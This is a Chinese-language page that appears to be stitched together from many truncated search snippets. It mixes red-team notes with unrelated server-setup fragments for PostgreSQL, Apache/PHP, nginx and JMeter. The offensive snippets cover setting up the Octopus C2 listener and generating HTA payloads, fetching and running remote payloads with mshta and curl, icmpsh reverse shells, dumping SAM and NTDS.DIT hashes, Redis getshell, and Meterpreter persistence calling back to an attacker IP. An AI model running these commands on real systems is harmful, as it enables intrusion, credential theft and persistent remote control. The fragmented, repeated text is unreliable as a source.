Octopus 以一种非常简单的方式工作,通过加密良好的通道执行命令并与 C2 交换信息,这使得它在几乎所有 AV、端点保护和网络监控解决方案中都变得不显眼且无法检测到。...Octopus 具有许多功能,可让您在实际需要部署完整的武器库或工具和技术之前深入了解即将进行的活动,例如: 通过 HTTP/S 控制代理。 执行系统命令。 下载/上传文件。...您可以使用以下命令在基于 Debian 的发行版上安装 nasm: apt install nasm 您可以mingw-w64使用以下命令在基于 Debian 的发行版上安装: apt install...Octopus 依赖 mono-csc 二进制文件来编译 C# 源代码,您可以通过以下命令安装它,该命令apt install mono-devel已在 kali 和 ubuntu 16.04 上测试过...您可以在不安装单声道的情况下使用八达通,但您将无法使用generate_exe命令。
文章前言 Octopus是基于python开发的一款可操作的C2服务器,可以通过HTTP/S控制Octopus powershell代理,其主要目的是要在任何红队行动之前使用,而不是开始与您的整个作战武库和基础设施接触...,例如: 下载文件 执行系统命令 通过HTTP/S控制代理 加载外部Powershell模块 在C2和代理之间使用加密的通道(AES-256) 使用不起眼的技术执行命令并传输结果 为每个目标创建自定义侦听器和多个侦听器...时间间隔:代理在检查命令之前将等待的秒数 URL:承载有效负载的页面的名称(例如:index.php) Listener_name:要使用的侦听器名称 您还可以通过运行以下listen_http...命令来查看示例: 我们可以使用以下命令启动侦听器: listen_http 0.0.0.0 8080 192.168.174.131 5 index.php operation1 之后将返回以下结果:...: 同时您可以使用Octopus从目标计算机上下载文件,只需执行“ download file_path”即可下载文件 HTA oneliner 要为listener1生成HTA oneliner,
前言 Octopus是基于python3的开源项目,可进行操作的C2服务器,可以通过HTTP / S控制Octopus powershell代理。...您还可以通过为您的域提供有效的证书并配置Octopus C2服务器以使用它来选择使用SSL / TLS。...来启动的方法和上面一样,只需要将seraph.xxx域名替换为IP即可 listen_http 0.0.0.0 8033 192.168.0.194 5 page2.php test2 Listen_https...:https监听器配置 https监听器的配置和http差不多只不过多了个证书和私钥 我由于是本地操作所以生成了一个自签名的证书 启动https监听器: listen_https 0.0.0.0 443...您可以使用以下命令“ generate_hta”生成HTA: generate_hta test 具体怎么操作使用就看各位大佬自行发挥。
在渗透过程中,攻击者往往需要通过命令下载执行恶意代码,实现信息收集、持久化、权限提升、防御绕过、提取凭证、横向移动、数据渗出等操作。...在目标主机执行恶意代码,可以分为上传/下载并执行恶意代码和无文件远程恶意代码执行。接下来,我们来总结一下Linux和Windows中下载和执行恶意代码的一些姿势。...一、Linux 远程恶意代码执行 01、curl 以用curl的方式执行http页面上的shell脚本,无需download,在本地机器上直接执行。...scp username@servername:/path/filename /tmp/local_destination 05、rsync 使用rsync可以进行远程同步,拉取文件到本地服务器。...rsync -av x.x.x.x:/tmp/passwd.txt /tmp/passwd.txt 06、sftp 使用sftp下载远程服务器上的文件。
不需要重新启动计算机!"...%\lib" SETX "PGDATA" "%PGHOME%\data" SETX "PATH" "%%PGHOME%%\bin;%path%" 5、初始化数据库 C:\Users\lhrxxt...+R在弹出的运行框中,输入:services.msc,如下: net start PostgreSQL 查看是否启动。...net start PostgreSQL 命令行下输入tasklist | grep postgres查看进程: image-20210421122245509 netstat –an 可以查看所有和本地计算机建立连接的...输入的内容允许来自一个文件,此外它还提供了一些元命令和多种类似 shell 的特性来实现书写脚本,以及对大量任务的自动化工作。
): win03运行: icmpsh.exe -t kali_ip -d 500 -b 30 -s 128 可以看到icmp进行通信的 Shell反弹不出的时候 主要针对:本机kali不是外网或者目标在..._x64没有这个,win03_x32有,听说是x32才有这个) 思路: 把需要上传的exe转换成十六进制hex的形式 通过echo命令将hex代码写入文件(echo也是有长度限制的) 使用debug功能将...LM_HASH Hash一般存储在两个地方:SAM文件,存储在本机 对应本地用户 NTDS.DIT文件,存储在域控上 对应域用户 本机hash+明文抓取 1、Get-PassHashes.ps1...QuarkPwDump是在win上面分析ntds.dit,这个是linux上面的离线分析 优点是能获取全部的用户,不用免杀,但是数据特别大,效率低,另外用vssown.vbs复制出来的ntds.dit数据库无法使用...: 如果出现User credentials cannot be used for local connections,应该是调用了calc.exe权限不够的问题 如果出现Description = 无法启动服务
Redis如果部署在Linux服务器上还好一些,配合nc可以很方便的就拿到了shell。但是如果部署在Windows环境下就比较鸡肋了,虽是这样说,但是也有一些getshell的办法。...测试Redis未授权访问 我是在Centos7上安装过Redis所以直接拿来用了。 [root@localhost src]# ....配置Windows server 2012 测试过程中发现,默认是无法在启动项文件夹写文件的,需要把C:\Users\Administrator文件夹的组添加上Everyone并把权限改成完全控制,改完以后再测试就可以了...三、使用Cobalt Strike 下载地址就不提供了,我是把Cobalt Strike的服务端脚本放到了kali上运行,然后客户端是在我本机(win10)运行的。...0x05 一些思考 在真实环境中确实遇到了几个可以访问启动目录的系统,在测试的过程中,如果安装了安全软件也是可以拿到shell的。
进行代理后,在windows下推荐使用Proxifier进行socket连接,规则自己定义 ?...2、linux 进行代理后,推荐使用proxychains进行socket连接 kali下的配置文件:/etc/proxychains.conf 添加一条:socks5 127.0.0.1 8888 然后在命令前加...思路: 把需要上传的exe转换成十六进制hex的形式 通过echo命令将hex代码写入文件(echo也是有长度限制的) 使用debug功能将hex代码还原出exe文件 ?...LM_HASH Hash一般存储在两个地方:SAM文件,存储在本机 对应本地用户 NTDS.DIT文件,存储在域控上 对应域用户 本机hash+明文抓取 1、Get-PassHashes.ps1 ?...win上面分析ntds.dit,这个是linux上面的离线分析 优点是能获取全部的用户,不用免杀,但是数据特别大,效率低,另外用vssown.vbs复制出来的ntds.dit数据库无法使用QuarksPwDump.exe
): win03运行: icmpsh.exe -t kali_ip -d 500 -b 30 -s 128 可以看到icmp进行通信的 #####Shell反弹不出的时候 主要针对:本机kali不是外网或者目标在..._x64没有这个,win03_x32有,听说是x32才有这个) 思路: 把需要上传的exe转换成十六进制hex的形式 通过echo命令将hex代码写入文件(echo也是有长度限制的) 使用debug功能将...LM_HASH Hash一般存储在两个地方: SAM文件,存储在本机 对应本地用户 NTDS.DIT文件,存储在域控上 对应域用户 #####本机hash+明文抓取 1、Get-PassHashes.ps1...2、导注册表+本地分析 Win2000和XP需要先提到SYSTEM,03开始直接可以reg save 导出的文件大,效率低,但是安全(测试的时候和QuarkPwDump抓取的hash不一致) reg...: 如果出现User credentials cannot be used for local connections,应该是调用了calc.exe权限不够的问题 如果出现Description = 无法启动服务
(关于图片的处理方案,上面已经写过了) 这个时候把这zip包如果发给其它联合运营商,它们在本地是无法跑起来了,因为里面有include,我的想法是希望有个小应用程度,接收的人双击一下点击后就能直接浏览游戏官网了...中每一个单元格是否包含需要查找的字符串并记录下,运行完后打开一个html页,html内容上需要显示匹配到的行、列和excel文件链接等信息)。...但是我在处理nginx的停止、重启的时候遇到了问题。 我先在nginx的目录下弄了两个bat批处理文件:restart.bat、stop.bat文件,如下图所示: ?...-s quit nginx.exe -s reload start nginx 之后我尝试使用下面的方法直接调用两个bat: var wsh = new ActiveXObject("...总结一下,用到的技术:php、javascript、css、hta、batch(批处理)、nginx的配置、SSI,上面记录下的是在实现那个想法时遇到的一些问题,以及如何定位问题然后解决它的。
一、安装配置Apache2.4.7(httpd-2.4.7-win64-VC11.zip ) 1、解压下载的安装包:httpd-2.4.7-win64-VC11.zip将其放到自己的安装目录(我的目录D..."Apache24"命令成功后会有成功的提示,此时你可以在window服务启动项中看到Apache24这个服务 然后点击启动就可以了,如果不想设置成开机启动的话也可以将启动类型修改为手动。...当然也可以通过D:\phpEnv\Apache24\bin下面的ApacheMonitor.exe来启动Apache这里就不多说了 如此Apache的配置就基本完成了。 ?...END 方法/步骤4 1 四、小结: Php环境的安装网上已经有很多资料了,自己在接触php的时候也是翻天覆地的查,在自己的电脑上也装过不少次了,开始的时候也用集成的软件包...END 注意事项 php_curl.dll libssh2.dll 始终无法加载的原因 及解决办法,在StackOverflow得到最终原因及解决办法 http://stackoverflow.com
在我们渗透测试过程中我们可以通过在攻击主机上搭建FTP服务,之后在目标主机上通过cmd下的ftp进行远程连接: 首先,在攻击主机使用IPOP启动一个简易的FTP服务: ?...如果你想要使得目标主机CS上线,那么也可以通过CS来构造hta文件 ? ? ? 之后在本地启动一个HTTP服务: ?...PHP 当目标主机内安装了Ruby时,我们可以在终端使用vim来编辑一个PHP脚本,之后执行PHP来实现远程文件下载: <?...FTP ftp在linux一般都自带,我们可以在终端输入ftp进行交互,所以我们可以在本地搭建FTP服务,之后在目标主机上通过终端下的ftp进行远程连接来下载文件~ 首先,在攻击主机使用IPOP启动一个简易的...TFTP tftp在linux一般都自带,我们可以在终端输入tftp进行交互,所以我们可以在本地搭建TFTP服务,之后在目标主机上通过终端下的tftp远程下载文件~ 首先,在攻击主机使用IPOP启动一个简易的
php-cgi是什么 在windows系统上面,安装了php后,在安装目录下面有下面三个文件: php.exe php-cgi.exe php-win.exe 以上的三个文件互不影响,我本地测试删除两个另外一个也能用...在命令行运行一个php文件 ?...include fastcgi_params; } 我们在命令行查看一下 php-cgi.exe 的帮助,它也是可以进行一些简单的配置的。...PHP-fpm 这个就是 FastCgi进程管理器 ,它的概念并不模糊!它启动服务监听端口,通过nginx反向代理给它,并且它自己内置php解释器。...Apache三种工作模式介绍与配置 php手册:在旧的Windows系统上安装 php-cgi和php-fpm有什么关系?
温馨提示 本文章仅供学习交流使用,文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!...通过对目标站点的扫描获取信息,发现开放8081端口 ? 对应web服务为phpmyadmin,这种页面我能想到的只有弱口令和空密码了 奈何本人太菜了 ?...之后为了进行有效的内网渗透得想办法让目标上线MSF或者CS 这里我选择的上线CS ? ? 这里我选择的web application执行文件 ? 生成恶意hta文件: ?...Copy恶意链接 终端mshta执行hta木马 ? ? 成功上线 ? 查看权限 sy ? 开放3389 不上远程的黑客不是好黑客 ? 新建个用户YDT ? 提升权限 ? 成功远程服务器 ?...command: run persistence -X -i 2 -p 8888 -r 123.123.123.123 -X指定启动的方式为开机自启动 -i反向连接的时间间隔(2s) –r 指定攻击者的
如果你想在win32下建立服务器,推荐使用bnetw,bnetw是bnetd 的win32移植版本,并且增加了图形用户界面,bnetw可以在 http://ugoth.net/bnetd/上找到 同时...如果你只是想建立一个临时性质的服务器或者作为测试使用, 则你可以在win32下运行bnetd, d2cs和d2dbs。...d2gs: 1).win2k/NT/XP 从系统服务控制管理中启动d2gs服务或者直接从命令行下运行 “net start d2gs” 2). win9x/me 运行c:\d2gs\d2gs.exe...在一台windows机器上安装它,然后拷贝所有的.mpq和.dll文件到你的linux机器的柯枷隆?br /> 解压d2gs到你拷贝diablo files的目录下。...修改d2csip和d2bdsip,让它们符合你的配置。(例如输入你的IP) 运行d2gs:在你运行d2gs.exe之前,在pvpgn服务器上运行d2cs和d2dbs,并确保它们配置正确。
JMeter 是一款开源纯 Java 应用程序, 旨在测量性能和负载测试应用程序, 目前由 Apache 软件基金会提供支持。 Q: 我能用 Apache JMeter 做什么?...Apache JMeter 功能包括: 1) 能够加载和性能测试许多不同的应用程序/服务器/协议类型: * Web - HTTP、HTTPS(Java、NodeJS、PHP、ASP.NET,...) *...SOAP / REST Web 服务 * FTP * 通过 JDBC 的数据库 * LDAP * 通过 JMS 的面向消息的中间件 (MOM) * 邮件 - SMTP(S)、POP3(S) 和 IMAP...(S) * 本机命令或 shell 脚本 * TCP * Java 对象 2) 功能齐全的测试 IDE,允许快速 记录测试计划(从浏览器或本机应用程序)、构建和调试 。...;%JAVA_HOME%\lib\dt.jar;%JAVA_HOME%\lib\tools.jar;" /M setx PATH "%PATH%;%JAVA_HOME%\bin\;" /M # 版本查看
这款工具最早被演示于BlackHat London 2019中,Octopus是一个基于python3的开源,可操作的C2服务器,它可以通过HTTP/ S控制Octopus powershell代理。...Octopus在与C2通信时被设计为隐秘且隐蔽的,因为它在Powershell代理与C2服务器之间的加密通道默认使用AES-256。 Octopus的功能: 通过HTTP / S控制代理。...执行系统命令。 下载文件。 加载外部Powershell模块。 在C2和代理之间使用加密的通道(AES-256)。 使用不起眼的技术执行命令并传输结果。...URL:承载有效负载的页面的名称(例如:index.php)。 Listener_name:要使用的侦听器名称。...其他两种也一样: generate_hta listener_name generate_exe listener_name output_path 注:用mono-project将C#代理编译为可执行文件
大家好,又见面了,我是你们的朋友全栈君。 声明:本文介绍的内容仅用于学习和研究目的,请勿用做非法用途。 ...路径下载的文件将保存在WebDAV客户端本地缓存: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV 在使用...UNC路径下载payload时,需要WebClient 服务启动,如果没有启动,可在命令行前面加上pushd \\webdavserver & popd命令。...c3a4XKrdsu3L.hta 在win7和win10测试,都可成功反弹shell: Empire也支持.hta的payload: usestager windows/hta 然后在目标主机执行...: mshta http://192.168.49.160:8000/payload.hta win7,10成功: 使用UNC路径的命令格式为: mshta \\webdavserver\folder
[attachment=890] 确定 Web 目录的应用程序设置和执行许可中选择为“纯脚本”,然后关闭 Internet 信息服务管理器, 在命令提示符中执行如下命令: net stop w3svc...第四步:安装GD库 这一步在前面PHP.INI配置中实际上已经安装好了, 在php.ini里找到 "extension_dir",然后将路径指向extension,如下(假设你的php安装路 径为:C...这段时间来,陆续大约有10多位落伍兄弟通过QQ加我咨询相关问题和询问PHP安装使用过程中的解决办法,大部分我都一一解答并给予帮助解决,一般都是通过远程直接给予帮助并都完满解决,个别仅仅通过QQ给予安装不成功的部分描述...这个错误用我介绍的权限设置方案可以完美解决,我在遇到这个错误后搜索了大量内容,都没给出详细解决办法,并且出现这个问题的人还很多,终于在我的尝试下解决了,如果还不能解决的请给EVEYONE权限试试 以上是一般遇到比较多的普遍问题...,当然PHP配置和使用中还有很多问题的,欢迎大家探讨!
nginx的configure命令支持以下参数: --prefix=*path* 定义一个目录,存放服务器上的文件 ,也就是nginx的安装目录。默认使用 /usr/local/nginx。...--conf-path=*path* 设置在nginx.conf配置文件的路径。nginx允许使用不同的配置文件启动,通过命令行中的-c选项。...--error-log-path=*path* 设置主错误,警告,和诊断文件的名称。安装完成后,可以随时改变的文件名 ,在nginx.conf配置文件中 使用 的error_log指令。...例如,当你在FreeBSD上使用PCRE库时需要使用:--with-cc-opt="-I /usr/local/include。....如图:启动成功 Nginx服务维护 为了避免每次开机手动启动,可以使用命令脚本,注册服务,开机自启动等 创建nginx启动命令脚本 `vi /etc/init.d/nginx` 插入以下内容, 注意修改
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
ICP备案
对象存储
实时音视频
即时通信 IM
